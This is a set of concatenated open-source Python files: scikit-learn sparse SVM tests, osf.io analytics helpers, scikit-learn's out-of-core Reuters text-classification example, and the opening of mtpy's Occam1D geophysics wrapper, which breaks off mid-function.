assert_array_almost_equal(clf.dual_coef_, sp_clf.dual_coef_.toarray())
assert_array_almost_equal(
clf.predict(iris.data.toarray()), sp_clf.predict(iris.data))
if k == 'linear':
assert_array_almost_equal(clf.coef_, sp_clf.coef_.toarray())
def test_sparse_decision_function():
"""
Test decision_function
Sanity check, test that decision_function implemented in python
returns the same as the one in libsvm
"""
# multi class:
clf = svm.SVC(kernel='linear', C=0.1).fit(iris.data, iris.target)
dec = safe_sparse_dot(iris.data, clf.coef_.T) + clf.intercept_
assert_array_almost_equal(dec, clf.decision_function(iris.data))
# binary:
clf.fit(X, Y)
dec = np.dot(X, clf.coef_.T) + clf.intercept_
prediction = clf.predict(X)
assert_array_almost_equal(dec.ravel(), clf.decision_function(X))
assert_array_almost_equal(
prediction,
clf.classes_[(clf.decision_function(X) > 0).astype(np.int).ravel()])
expected = np.array([-1., -0.66, -1., 0.66, 1., 1.])
assert_array_almost_equal(clf.decision_function(X), expected, 2)
def test_error():
    """Deficient inputs must raise ValueError; valid input must still fit."""
    # C must be strictly positive.
    assert_raises(ValueError, svm.SVC(C=-1).fit, X, Y)

    # nu = 0 is outside the valid range and is rejected at fit time.
    bad_clf = svm.NuSVC(nu=0.0)
    assert_raises(ValueError, bad_clf.fit, X_sp, Y)

    # A label vector of the wrong length is rejected as well.
    truncated_labels = Y[:-1]
    assert_raises(ValueError, bad_clf.fit, X_sp, truncated_labels)

    # Sanity check: a well-formed problem still fits and predicts.
    good_clf = svm.SVC()
    good_clf.fit(X_sp, Y)
    assert_array_equal(good_clf.predict(T), true_result)
def test_linearsvc():
# Similar to test_SVC
clf = svm.LinearSVC(random_state=0).fit(X, Y)
sp_clf = svm.LinearSVC(random_state=0).fit(X_sp, Y)
assert_true(sp_clf.fit_intercept)
assert_array_almost_equal(clf.coef_, sp_clf.coef_, decimal=4)
assert_array_almost_equal(clf.intercept_, sp_clf.intercept_, decimal=4)
assert_array_almost_equal(clf.predict(X), sp_clf.predict(X_sp))
clf.fit(X2, Y2)
sp_clf.fit(X2_sp, Y2)
assert_array_almost_equal(clf.coef_, sp_clf.coef_, decimal=4)
assert_array_almost_equal(clf.intercept_, sp_clf.intercept_, decimal=4)
def test_linearsvc_iris():
# Test the sparse LinearSVC with the iris dataset
sp_clf = svm.LinearSVC(random_state=0).fit(iris.data, iris.target)
clf = svm.LinearSVC(random_state=0).fit(iris.data.toarray(), iris.target)
assert_equal(clf.fit_intercept, sp_clf.fit_intercept)
assert_array_almost_equal(clf.coef_, sp_clf.coef_, decimal=1)
assert_array_almost_equal(clf.intercept_, sp_clf.intercept_, decimal=1)
assert_array_almost_equal(
clf.predict(iris.data.toarray()), sp_clf.predict(iris.data))
# check decision_function
pred = np.argmax(sp_clf.decision_function(iris.data), 1)
assert_array_almost_equal(pred, clf.predict(iris.data.toarray()))
# sparsify the coefficients on both models and check that they still
# produce the same results
clf.sparsify()
assert_array_equal(pred, clf.predict(iris.data))
sp_clf.sparsify()
assert_array_equal(pred, sp_clf.predict(iris.data))
def test_weight():
# Test class weights
X_, y_ = make_classification(n_samples=200, n_features=100,
weights=[0.833, 0.167], random_state=0)
X_ = sparse.csr_matrix(X_)
for clf in (linear_model.LogisticRegression(),
svm.LinearSVC(random_state=0),
svm.SVC()):
clf.set_params(class_weight={0: 5})
clf.fit(X_[:180], y_[:180])
y_pred = clf.predict(X_[180:])
assert_true(np.sum(y_pred == y_[180:]) >= 11)
def test_sample_weights():
    """Per-sample weights can flip the predicted class of a point."""
    model = svm.SVC()
    model.fit(X_sp, Y)
    assert_array_equal(model.predict(X[2]), [1.])

    # Heavily up-weight the second half of the samples and refit.
    weights = [.1] * 3 + [10] * 3
    model.fit(X_sp, Y, sample_weight=weights)
    assert_array_equal(model.predict(X[2]), [2.])
def test_sparse_liblinear_intercept_handling():
# Test that sparse liblinear honours intercept_scaling param
test_svm.test_dense_liblinear_intercept_handling(svm.LinearSVC)
def test_sparse_realdata():
# Test on a subset from the 20newsgroups dataset.
# This catchs some bugs if input is not correctly converted into
# sparse format or weights are not correctly initialized.
data = np.array([0.03771744, 0.1003567, 0.01174647, 0.027069])
indices = np.array([6, 5, 35, 31])
indptr = np.array(
[0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2, 2, 2, 2, 2, 2,
2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2,
2, 2, 2, 2, 2, 2, 2, 2, 2, 4, 4, 4])
X = sparse.csr_matrix((data, indices, indptr))
y = np.array(
[1., 0., 2., 2., 1., 1., 1., 2., 2., 0., 1., 2., 2.,
0., 2., 0., 3., 0., 3., 0., 1., 1., 3., 2., 3., 2.,
0., 3., 1., 0., 2., 1., 2., 0., 1., 0., 2., 3., 1.,
3., 0., 1., 0., 0., 2., 0., 1., 2., 2., 2., 3., 2.,
0., 3., 2., 1., 2., 3., 2., 2., 0., 1., 0., 1., 2.,
3., 0., 0., 2., 2., 1., 3., 1., 1., 0., 1., 2., 1.,
1., 3.])
clf = svm.SVC(kernel='linear').fit(X.toarray(), y)
sp_clf = svm.SVC(kernel='linear').fit(sparse.coo_matrix(X), y)
assert_array_equal(clf.support_vectors_, sp_clf.support_vectors_.toarray())
assert_array_equal(clf.dual_coef_, sp_clf.dual_coef_.toarray())
def test_sparse_svc_clone_with_callable_kernel():
# Test that the "dense_fit" is called even though we use sparse input
# meaning that everything works fine.
a = svm.SVC(C=1, kernel=lambda x, y: x * y.T, probability=True,
random_state=0)
b = base.clone(a)
b.fit(X_sp, Y)
pred = b.predict(X_sp)
b.predict_proba(X_sp)
dense_svm = svm.SVC(C=1, kernel=lambda x, y: np.dot(x, y.T),
probability=True, random_state=0)
pred_dense = dense_svm.fit(X, Y).predict(X)
assert_array_equal(pred_dense, pred)
# b.decision_function(X_sp) # XXX : should be supported
def test_timeout():
    """With max_iter=1 the solver cannot converge and must warn."""
    limited = svm.SVC(C=1, kernel=lambda x, y: x * y.T, probability=True,
                      random_state=0, max_iter=1)
    assert_warns(ConvergenceWarning, limited.fit, X_sp, Y)
def test_consistent_proba():
    """Identical seeds must give identical probability estimates."""
    first = svm.SVC(probability=True, max_iter=1, random_state=0)
    proba_first = first.fit(X, Y).predict_proba(X)

    second = svm.SVC(probability=True, max_iter=1, random_state=0)
    proba_second = second.fit(X, Y).predict_proba(X)

    assert_array_almost_equal(proba_first, proba_second)
| bsd-3-clause |
revanthkolli/osf.io | scripts/analytics/utils.py | 6 | 1349 | # -*- coding: utf-8 -*-
import os
import unicodecsv as csv
from bson import ObjectId
import matplotlib.pyplot as plt
import matplotlib.dates as mdates
import seaborn as sns # noqa
import requests
from website.addons.osfstorage import utils as storage_utils
def oid_to_datetime(oid):
    """Return the creation timestamp embedded in a Mongo ObjectId."""
    object_id = ObjectId(oid)
    return object_id.generation_time
def mkdirp(path):
    """Create ``path`` (including parents) if it does not already exist.

    Unlike a bare ``except OSError: pass``, only the "directory already
    exists" case is ignored; any other failure (e.g. permission denied,
    or a regular file occupying ``path``) is re-raised.
    """
    try:
        os.makedirs(path)
    except OSError:
        # Swallow the error only when the directory is actually there.
        if not os.path.isdir(path):
            raise
def plot_dates(dates, *args, **kwargs):
    """Plot date histogram.

    ``dates`` is an iterable of datetime-like objects; extra positional
    and keyword arguments are forwarded to ``Axes.hist``. Returns the
    matplotlib ``Figure``.
    """
    fig = plt.figure()
    ax = fig.add_subplot(111)
    # Histograms need numeric data: convert datetimes to matplotlib's
    # float date representation first.
    ax.hist(
        [mdates.date2num(each) for each in dates],
        *args, **kwargs
    )
    # Rotate/format tick labels so ISO dates remain readable.
    fig.autofmt_xdate()
    ax.format_xdata = mdates.DateFormatter('%Y-%m-%d')
    ax.xaxis.set_major_formatter(mdates.DateFormatter('%Y-%m-%d'))
    return fig
def make_csv(fp, rows, headers=None):
    """Write ``rows`` to file object ``fp`` as CSV, preceded by the
    optional ``headers`` row when one is given."""
    csv_writer = csv.writer(fp)
    if headers:
        csv_writer.writerow(headers)
    csv_writer.writerows(rows)
def send_file(app, name, content_type, file_like, node, user):
    """Upload file to OSF.

    ``app`` is a Flask-style app providing ``test_request_context``;
    ``name`` is the destination path, ``content_type`` the MIME type,
    ``file_like`` the content, and ``node``/``user`` identify the OSF
    target and uploader.
    """
    # Rewind so the full content is uploaded regardless of prior reads.
    file_like.seek(0)
    # The waterbutler URL builder needs an active request context.
    with app.test_request_context():
        upload_url = storage_utils.get_waterbutler_upload_url(
            user,
            node,
            path=name,
        )
        requests.put(
            upload_url,
            data=file_like,
            headers={'Content-Type': content_type},
        )
| apache-2.0 |
frank-tancf/scikit-learn | examples/applications/plot_out_of_core_classification.py | 32 | 13829 | """
======================================================
Out-of-core classification of text documents
======================================================
This is an example showing how scikit-learn can be used for classification
using an out-of-core approach: learning from data that doesn't fit into main
memory. We make use of an online classifier, i.e., one that supports the
partial_fit method, that will be fed with batches of examples. To guarantee
that the features space remains the same over time we leverage a
HashingVectorizer that will project each example into the same feature space.
This is especially useful in the case of text classification where new
features (words) may appear in each batch.
The dataset used in this example is Reuters-21578 as provided by the UCI ML
repository. It will be automatically downloaded and uncompressed on first run.
The plot represents the learning curve of the classifier: the evolution
of classification accuracy over the course of the mini-batches. Accuracy is
measured on the first 1000 samples, held out as a validation set.
To limit the memory consumption, we queue examples up to a fixed amount before
feeding them to the learner.
"""
# Authors: Eustache Diemert <eustache@diemert.fr>
# @FedericoV <https://github.com/FedericoV/>
# License: BSD 3 clause
from __future__ import print_function
from glob import glob
import itertools
import os.path
import re
import tarfile
import time
import numpy as np
import matplotlib.pyplot as plt
from matplotlib import rcParams
from sklearn.externals.six.moves import html_parser
from sklearn.externals.six.moves import urllib
from sklearn.datasets import get_data_home
from sklearn.feature_extraction.text import HashingVectorizer
from sklearn.linear_model import SGDClassifier
from sklearn.linear_model import PassiveAggressiveClassifier
from sklearn.linear_model import Perceptron
from sklearn.naive_bayes import MultinomialNB
def _not_in_sphinx():
# Hack to detect whether we are running by the sphinx builder
return '__file__' in globals()
###############################################################################
# Reuters Dataset related routines
###############################################################################
class ReutersParser(html_parser.HTMLParser):
    """Utility class to parse a SGML file and yield documents one at a time."""

    def __init__(self, encoding='latin-1'):
        html_parser.HTMLParser.__init__(self)
        self._reset()
        self.encoding = encoding

    def handle_starttag(self, tag, attrs):
        # Dispatch <tag ...> to a start_<tag> handler when one is defined.
        method = 'start_' + tag
        getattr(self, method, lambda x: None)(attrs)

    def handle_endtag(self, tag):
        # Dispatch </tag> to an end_<tag> handler when one is defined.
        method = 'end_' + tag
        getattr(self, method, lambda: None)()

    def _reset(self):
        # State flags: which SGML element we are currently inside.
        self.in_title = 0
        self.in_body = 0
        self.in_topics = 0
        self.in_topic_d = 0
        # Accumulators for the document currently being parsed.
        self.title = ""
        self.body = ""
        self.topics = []
        self.topic_d = ""

    def parse(self, fd):
        """Yield one document dict per <REUTERS> element read from *fd*."""
        self.docs = []
        for chunk in fd:
            self.feed(chunk.decode(self.encoding))
            # end_reuters() appends finished docs; drain them per chunk.
            for doc in self.docs:
                yield doc
            self.docs = []
        self.close()

    def handle_data(self, data):
        # Route character data into whichever element is currently open.
        if self.in_body:
            self.body += data
        elif self.in_title:
            self.title += data
        elif self.in_topic_d:
            self.topic_d += data

    def start_reuters(self, attributes):
        pass

    def end_reuters(self):
        # Collapse runs of whitespace and emit the finished document.
        self.body = re.sub(r'\s+', r' ', self.body)
        self.docs.append({'title': self.title,
                          'body': self.body,
                          'topics': self.topics})
        self._reset()

    def start_title(self, attributes):
        self.in_title = 1

    def end_title(self):
        self.in_title = 0

    def start_body(self, attributes):
        self.in_body = 1

    def end_body(self):
        self.in_body = 0

    def start_topics(self, attributes):
        self.in_topics = 1

    def end_topics(self):
        self.in_topics = 0

    def start_d(self, attributes):
        self.in_topic_d = 1

    def end_d(self):
        # A closed <D> element holds one complete topic label.
        self.in_topic_d = 0
        self.topics.append(self.topic_d)
        self.topic_d = ""
def stream_reuters_documents(data_path=None):
    """Iterate over documents of the Reuters dataset.

    The Reuters archive will automatically be downloaded and uncompressed if
    the `data_path` directory does not exist.

    Documents are represented as dictionaries with 'body' (str),
    'title' (str), 'topics' (list(str)) keys.
    """
    # BUG FIX: `glob` was used below but never imported at module level,
    # which made this generator raise NameError on first iteration.
    from glob import glob

    DOWNLOAD_URL = ('http://archive.ics.uci.edu/ml/machine-learning-databases/'
                    'reuters21578-mld/reuters21578.tar.gz')
    ARCHIVE_FILENAME = 'reuters21578.tar.gz'
    if data_path is None:
        data_path = os.path.join(get_data_home(), "reuters")
    if not os.path.exists(data_path):
        # Download and unpack the archive once; subsequent calls reuse it.
        print("downloading dataset (once and for all) into %s" %
              data_path)
        os.mkdir(data_path)

        def progress(blocknum, bs, size):
            # urlretrieve reporthook: print a running download counter.
            total_sz_mb = '%.2f MB' % (size / 1e6)
            current_sz_mb = '%.2f MB' % ((blocknum * bs) / 1e6)
            if _not_in_sphinx():
                print('\rdownloaded %s / %s' % (current_sz_mb, total_sz_mb),
                      end='')

        archive_path = os.path.join(data_path, ARCHIVE_FILENAME)
        urllib.request.urlretrieve(DOWNLOAD_URL, filename=archive_path,
                                   reporthook=progress)
        if _not_in_sphinx():
            print('\r', end='')
        print("untarring Reuters dataset...")
        tarfile.open(archive_path, 'r:gz').extractall(data_path)
        print("done.")
    parser = ReutersParser()
    for filename in glob(os.path.join(data_path, "*.sgm")):
        for doc in parser.parse(open(filename, 'rb')):
            yield doc
###############################################################################
# Main
###############################################################################

# Create the vectorizer and limit the number of features to a reasonable
# maximum.  HashingVectorizer is stateless, so it can transform mini-batches
# without ever seeing the full corpus.
vectorizer = HashingVectorizer(decode_error='ignore', n_features=2 ** 18,
                               non_negative=True)

# Iterator over parsed Reuters SGML files.
data_stream = stream_reuters_documents()

# We learn a binary classification between the "acq" class and all the others.
# "acq" was chosen as it is more or less evenly distributed in the Reuters
# files. For other datasets, one should take care of creating a test set with
# a realistic portion of positive instances.
all_classes = np.array([0, 1])
positive_class = 'acq'

# Here are some classifiers that support the `partial_fit` method
partial_fit_classifiers = {
    'SGD': SGDClassifier(),
    'Perceptron': Perceptron(),
    'NB Multinomial': MultinomialNB(alpha=0.01),
    'Passive-Aggressive': PassiveAggressiveClassifier(),
}
def get_minibatch(doc_iter, size, pos_class=positive_class):
    """Extract a minibatch of examples, return a tuple X_text, y.

    Note: size is before excluding invalid docs with no topics assigned.
    """
    pairs = []
    for doc in itertools.islice(doc_iter, size):
        if doc['topics']:
            text = u'{title}\n\n{body}'.format(**doc)
            pairs.append((text, pos_class in doc['topics']))
    if not pairs:
        # Stream exhausted: return empty arrays so callers can stop cleanly.
        return np.asarray([], dtype=int), np.asarray([], dtype=int)
    texts, labels = zip(*pairs)
    return texts, np.asarray(labels, dtype=int)
def iter_minibatches(doc_iter, minibatch_size):
    """Generator of minibatches."""
    while True:
        X_text, y = get_minibatch(doc_iter, minibatch_size)
        if not len(X_text):
            # Underlying stream is exhausted.
            break
        yield X_text, y
# test data statistics
test_stats = {'n_test': 0, 'n_test_pos': 0}

# First we hold out a number of examples to estimate accuracy
n_test_documents = 1000
tick = time.time()
X_test_text, y_test = get_minibatch(data_stream, 1000)
parsing_time = time.time() - tick
tick = time.time()
# Vectorize the held-out texts once; reused by every classifier's score().
X_test = vectorizer.transform(X_test_text)
vectorizing_time = time.time() - tick
test_stats['n_test'] += len(y_test)
test_stats['n_test_pos'] += sum(y_test)
print("Test set is %d documents (%d positive)" % (len(y_test), sum(y_test)))
def progress(cls_name, stats):
    """Report progress information, return a string."""
    duration = time.time() - stats['t0']
    # Assemble the report from fixed-width fragments; reads the module-level
    # test_stats dict for the held-out set counts.
    fragments = [
        "%20s classifier : \t" % cls_name,
        "%(n_train)6d train docs (%(n_train_pos)6d positive) " % stats,
        "%(n_test)6d test docs (%(n_test_pos)6d positive) " % test_stats,
        "accuracy: %(accuracy).3f " % stats,
        "in %.2fs (%5d docs/s)" % (duration, stats['n_train'] / duration),
    ]
    return "".join(fragments)
# Per-classifier bookkeeping: counts, accuracy and timing histories.
cls_stats = {}
for cls_name in partial_fit_classifiers:
    stats = {'n_train': 0, 'n_train_pos': 0,
             'accuracy': 0.0, 'accuracy_history': [(0, 0)], 't0': time.time(),
             'runtime_history': [(0, 0)], 'total_fit_time': 0.0}
    cls_stats[cls_name] = stats

get_minibatch(data_stream, n_test_documents)
# Discard test set
# NOTE(review): 1000 documents were already consumed for the test set above;
# this line skips a *further* n_test_documents from the stream — confirm that
# the double discard is intended.

# We will feed the classifier with mini-batches of 1000 documents; this means
# we have at most 1000 docs in memory at any time. The smaller the document
# batch, the bigger the relative overhead of the partial fit methods.
minibatch_size = 1000

# Create the data_stream that parses Reuters SGML files and iterates on
# documents as a stream.
minibatch_iterators = iter_minibatches(data_stream, minibatch_size)
total_vect_time = 0.0
# Main loop : iterate on mini-batches of examples
for i, (X_train_text, y_train) in enumerate(minibatch_iterators):

    # Vectorize the raw texts of this mini-batch (shared by all classifiers).
    tick = time.time()
    X_train = vectorizer.transform(X_train_text)
    total_vect_time += time.time() - tick

    for cls_name, cls in partial_fit_classifiers.items():
        tick = time.time()
        # update estimator with examples in the current mini-batch
        cls.partial_fit(X_train, y_train, classes=all_classes)

        # accumulate test accuracy stats
        cls_stats[cls_name]['total_fit_time'] += time.time() - tick
        cls_stats[cls_name]['n_train'] += X_train.shape[0]
        cls_stats[cls_name]['n_train_pos'] += sum(y_train)
        tick = time.time()
        # Score on the fixed held-out set after every batch.
        cls_stats[cls_name]['accuracy'] = cls.score(X_test, y_test)
        cls_stats[cls_name]['prediction_time'] = time.time() - tick
        acc_history = (cls_stats[cls_name]['accuracy'],
                       cls_stats[cls_name]['n_train'])
        cls_stats[cls_name]['accuracy_history'].append(acc_history)
        # Runtime history uses cumulative vectorize + fit wall time.
        run_history = (cls_stats[cls_name]['accuracy'],
                       total_vect_time + cls_stats[cls_name]['total_fit_time'])
        cls_stats[cls_name]['runtime_history'].append(run_history)

        # Report progress only every third batch to limit console noise.
        if i % 3 == 0:
            print(progress(cls_name, cls_stats[cls_name]))
    if i % 3 == 0:
        print('\n')
###############################################################################
# Plot results
###############################################################################
def plot_accuracy(x, y, x_legend):
    """Plot accuracy as a function of x on the current matplotlib axes."""
    xs = np.array(x)
    ys = np.array(y)
    plt.title('Classification accuracy as a function of %s' % x_legend)
    plt.xlabel('%s' % x_legend)
    plt.ylabel('Accuracy')
    plt.grid(True)
    plt.plot(xs, ys)
rcParams['legend.fontsize'] = 10
cls_names = list(sorted(cls_stats.keys()))

# Plot accuracy evolution
plt.figure()
for _, stats in sorted(cls_stats.items()):
    # Plot accuracy evolution with #examples
    accuracy, n_examples = zip(*stats['accuracy_history'])
    plot_accuracy(n_examples, accuracy, "training examples (#)")
    ax = plt.gca()
    ax.set_ylim((0.8, 1))
plt.legend(cls_names, loc='best')

plt.figure()
for _, stats in sorted(cls_stats.items()):
    # Plot accuracy evolution with runtime
    accuracy, runtime = zip(*stats['runtime_history'])
    plot_accuracy(runtime, accuracy, 'runtime (s)')
    ax = plt.gca()
    ax.set_ylim((0.8, 1))
plt.legend(cls_names, loc='best')

# Plot fitting times: one bar per classifier plus one for vectorization.
plt.figure()
fig = plt.gcf()
cls_runtime = []
for cls_name, stats in sorted(cls_stats.items()):
    cls_runtime.append(stats['total_fit_time'])

cls_runtime.append(total_vect_time)
cls_names.append('Vectorization')
bar_colors = ['b', 'g', 'r', 'c', 'm', 'y']

ax = plt.subplot(111)
rectangles = plt.bar(range(len(cls_names)), cls_runtime, width=0.5,
                     color=bar_colors)

ax.set_xticks(np.linspace(0.25, len(cls_names) - 0.75, len(cls_names)))
ax.set_xticklabels(cls_names, fontsize=10)
ymax = max(cls_runtime) * 1.2
ax.set_ylim((0, ymax))
ax.set_ylabel('runtime (s)')
ax.set_title('Training Times')
def autolabel(rectangles):
    """Write each bar's height as a text label just above it.

    Uses the module-level ``ax`` axes set up by the surrounding script.
    """
    for rect in rectangles:
        height = rect.get_height()
        x_center = rect.get_x() + rect.get_width() / 2.
        ax.text(x_center, 1.05 * height, '%.4f' % height,
                ha='center', va='bottom')
autolabel(rectangles)
plt.show()

# Plot prediction times: per-classifier scoring plus the one-off parse and
# vectorize costs of preparing the test set.
plt.figure()
cls_runtime = []
cls_names = list(sorted(cls_stats.keys()))
for cls_name, stats in sorted(cls_stats.items()):
    cls_runtime.append(stats['prediction_time'])
cls_runtime.append(parsing_time)
cls_names.append('Read/Parse\n+Feat.Extr.')
cls_runtime.append(vectorizing_time)
cls_names.append('Hashing\n+Vect.')

ax = plt.subplot(111)
rectangles = plt.bar(range(len(cls_names)), cls_runtime, width=0.5,
                     color=bar_colors)

ax.set_xticks(np.linspace(0.25, len(cls_names) - 0.75, len(cls_names)))
ax.set_xticklabels(cls_names, fontsize=8)
plt.setp(plt.xticks()[1], rotation=30)
ymax = max(cls_runtime) * 1.2
ax.set_ylim((0, ymax))
ax.set_ylabel('runtime (s)')
ax.set_title('Prediction Times (%d instances)' % n_test_documents)
autolabel(rectangles)
plt.show()
| bsd-3-clause |
geophysics/mtpy | mtpy/modeling/occam1d.py | 1 | 112593 | # -*- coding: utf-8 -*-
"""
==================
Occam1D
==================
* Wrapper class to interact with Occam1D written by Kerry Keys at Scripps
adapted from the method of Constable et al., [1987].
* This class only deals with the MT functionality of the Fortran code, so
it can make the input files for computing the 1D MT response of an input
model and or data. It can also read the output and plot them in a
useful way.
* Note that when you run the inversion code, the convergence is quite
quick, within the first few iterations, so have a look at the L2 cure
to decide which iteration to plot, otherwise if you look at iterations
long after convergence the models will be unreliable.
* Key, K., 2009, 1D inversion of multicomponent, multi-frequency marine
CSEM data: Methodology and synthetic studies for resolving thin
resistive layers: Geophysics, 74, F9–F20.
* The original paper describing the Occam's inversion approach is:
* Constable, S. C., R. L. Parker, and C. G. Constable, 1987,
Occam’s inversion –– A practical algorithm for generating smooth
models from electromagnetic sounding data, Geophysics, 52 (03), 289–300.
:Intended Use: ::
>>> import mtpy.modeling.occam1d as occam1d
>>> #--> make a data file
>>> d1 = occam1d.Data()
>>> d1.write_data_file(edi_file=r'/home/MT/mt01.edi', res_err=10, phase_err=2.5,
>>> ... save_path=r"/home/occam1d/mt01/TE", mode='TE')
>>> #--> make a model file
>>> m1 = occam1d.Model()
>>> m1.write_model_file(save_path=d1.save_path, target_depth=15000)
>>> #--> make a startup file
>>> s1 = occam1d.Startup()
>>> s1.data_fn = d1.data_fn
>>> s1.model_fn = m1.model_fn
>>> s1.save_path = m1.save_path
>>> s1.write_startup_file()
>>> #--> run occam1d from python
>>> occam_path = r"/home/occam1d/Occam1D_executable"
>>> occam1d.Run(s1.startup_fn, occam_path, mode='TE')
>>> #--plot the L2 curve
>>> l2 = occam1d.PlotL2(d1.save_path, m1.model_fn)
>>> #--> see that iteration 7 is the optimum model to plot
>>> p1 = occam1d.Plot1DResponse()
>>> p1.data_te_fn = d1.data_fn
>>> p1.model_fn = m1.model_fn
>>> p1.iter_te_fn = r"/home/occam1d/mt01/TE/TE_7.iter"
>>> p1.resp_te_fn = r"/home/occam1d/mt01/TE/TE_7.resp"
>>> p1.plot()
@author: J. Peacock (Oct. 2013)
"""
#------------------------------------------------------------------------------
import numpy as np
import os
import os.path as op
import time
from matplotlib.ticker import MultipleLocator
import matplotlib.gridspec as gridspec
import mtpy.core.edi as mtedi
import mtpy.utils.calculator as mtcc
import mtpy.analysis.geometry as mtg
import mtpy.analysis.pt as mtpt
import matplotlib.pyplot as plt
import subprocess
import string
#------------------------------------------------------------------------------
class Data(object):
    """
    Reads and writes Occam1D data files.

    ===================== =====================================================
    Attributes            Description
    ===================== =====================================================
    _data_fn              basename of data file *default* is Occam1d_DataFile
    _header_line          header line for description of data columns
    _ss                   string spacing *default* is 6*' '
    _string_fmt           format of data *default* is '+.6e'
    data                  dictionary of data arrays (filled by read methods)
    data_fn               full path to data file
    freq                  frequency array of data
    mode                  mode to invert for [ 'TE' | 'TM' ]
    phase_te              array of TE phase
    phase_tm              array of TM phase
    res_te                array of TE apparent resistivity
    res_tm                array of TM apparent resistivity
    resp_fn               full path to response file
    save_path             path to save files to
    ===================== =====================================================

    ===================== =====================================================
    Methods               Description
    ===================== =====================================================
    write_data_file       write an Occam1D data file
    read_data_file        read an Occam1D data file
    read_resp_file        read a .resp file output by Occam1D
    ===================== =====================================================

    :Example: ::

        >>> import mtpy.modeling.occam1d as occam1d
        >>> #--> make a data file for TE mode
        >>> d1 = occam1d.Data()
        >>> d1.write_data_file(edi_file=r'/home/MT/mt01.edi', res_err=10,
        >>> ...                phase_err=2.5,
        >>> ...                save_path=r"/home/occam1d/mt01/TE", mode='TE')
    """

    def __init__(self, data_fn=None, **kwargs):
        # NOTE(review): **kwargs is accepted but never consumed here —
        # unknown keywords are silently ignored; confirm intended.
        self.data_fn = data_fn
        if self.data_fn is not None:
            self.save_path = os.path.dirname(self.data_fn)
        else:
            self.save_path = os.getcwd()
        # Formatting of numbers and column spacing in the output file.
        self._string_fmt = '+.6e'
        self._ss = 6*' '
        self._data_fn = 'Occam1d_DataFile'
        self._header_line = '!{0}\n'.format(' '.join(['Type','Freq#',
                                                      'TX#', 'Rx#','Data',
                                                      'Std_Error']))
        self.mode = 'TE'
        # Containers filled by write_data_file / read_data_file.
        self.data = None
        self.freq = None
        self.res_te = None
        self.res_tm = None
        self.phase_te = None
        self.phase_tm = None
        self.resp_fn = None
    def write_data_file(self, rp_tuple=None, edi_file=None, save_path=None,
                        mode='TE', res_err='data', phase_err='data', thetar=0,
                        res_errorfloor = 0., phase_errorfloor = 0., z_errorfloor=0.,
                        remove_outofquadrant=False):
        """
        Write an Occam1D data file from either an edi file or an rp tuple.

        Arguments:
        ----------
            **rp_tuple** : np.ndarray (freq, res, res_err, phase, phase_err)
                           with res, phase having shape (num_freq, 2, 2).

            **edi_file** : string
                           full path to edi file to be modeled.

            **save_path** : string
                            path to save the file; if None the dirname of
                            edi_file is used.

            **thetar** : float
                         rotation angle to rotate Z. Clockwise positive,
                         N = 0.  *default* = 0

            **mode** : [ 'TE' | 'TM' | 'det' ] (or with 'z' in the string to
                       write real/imaginary impedance instead of rho/phase)

            **res_err** : float or 'data'
                          'data' uses errorbars from the data, a number is a
                          percent error (e.g. 10 for ten percent).

            **phase_err** : float or 'data'
                            as res_err but for phase.

            **res_errorfloor** : float
                                 error floor for resistivity values in percent

            **phase_errorfloor** : float
                                   error floor for phase in degrees

            **z_errorfloor** : float
                               error floor for impedance in percent

            **remove_outofquadrant** : True/False; remove points with phases
                                       outside the 1st/3rd quadrant (Occam
                                       requires 0 < phase < 90 degrees).

        :Example: ::

            >>> import mtpy.modeling.occam1d as occam1d
            >>> d1 = occam1d.Data()
            >>> d1.write_data_file(edi_file=r'/home/MT/mt01.edi', res_err=10,
            >>> ...                phase_err=2.5, mode='TE',
            >>> ...                save_path=r"/home/occam1d/mt01/TE")
        """
        self.mode = mode
        if edi_file is None and rp_tuple is None:
            raise IOError('Need to input either an edi file or rp_array')
        if edi_file is not None:
            #raise an error if can't find the edifile
            if os.path.isfile(edi_file) == False:
                raise IOError('No edi file {0} exists, check path'.format(edi_file))
            #read in edifile
            e1 = mtedi.Edi(edi_file)
            impz = e1.Z
            #rotate if necessary
            if thetar != 0:
                impz.rotate(thetar)
            #get resistivity and phase
            rho = impz.resistivity
            rho_err = impz.resistivity_err
            phi = impz.phase
            phi_err = impz.phase_err
            freq = impz.freq
            nf = len(freq)
            #get determinant resistivity and phase
            if 'det' in mode.lower():
                zdet, zdet_err = np.abs(impz.det)
                zdet_err = np.abs(zdet_err)
                rho = .2/freq*abs(zdet)
                phi = np.rad2deg(np.arctan2((zdet**0.5).imag, (zdet**0.5).real))
        if rp_tuple is not None:
            if len(rp_tuple) != 5:
                raise IOError('Be sure rp_array is correctly formated\n'
                              'should be freq, res, res_err, phase, phase_err')
            freq, rho, rho_err, phi, phi_err = rp_tuple
            if 'det' in mode.lower():
                # Determinant mode expects single-component arrays; pull the
                # off-diagonal component from the (nf, 2, 2) arrays.
                rho = rho[:, 0, 1]
                phi = phi[:, 0, 1]
                rho_err = rho_err[:, 0, 1]
                phi_err = phi_err[:, 0, 1]
            nf = len(freq)
        # Choose what is written: impedance (scaled by mu0*2*pi*1e-7 factor
        # np.pi*4e-4 — presumably field-unit conversion, TODO confirm) or
        # rho/phase.
        if 'z' in mode.lower():
            if 'det' in mode.lower():
                data1, data1_err = (zdet**0.5).real*np.pi*4e-4, zdet_err**0.5*np.pi*4e-4
                data2, data2_err = (zdet**0.5).imag*np.pi*4e-4, zdet_err**0.5*np.pi*4e-4
            else:
                data1, data1_err = impz.z.real*np.pi*4e-4, impz.zerr*np.pi*4e-4
                data2, data2_err = impz.z.imag*np.pi*4e-4, impz.zerr*np.pi*4e-4
            dstring1,dstring2 = 'Real','Imag'
        else:
            data1, data1_err = rho, rho_err
            data2, data2_err = phi, phi_err
            dstring1,dstring2 = 'Rho','Phs'
        # remove data points with phase out of quadrant
        # NOTE(review): several conditions below are duplicated verbatim
        # (e.g. the same (data1/data2 > 0) term twice) — looks like a
        # copy-paste slip; behavior is unchanged but confirm intent.
        if remove_outofquadrant:
            if 'det' in mode.lower():
                if 'z' in mode.lower():
                    include = (data1/data2 > 0) & (data1/data2 > 0)
                else:
                    include = (phi%180 <= 90) & (phi%180 >= 0) & (phi%180 <= 90) & (phi%180 >= 0)
            else:
                if 'z' in mode.lower():
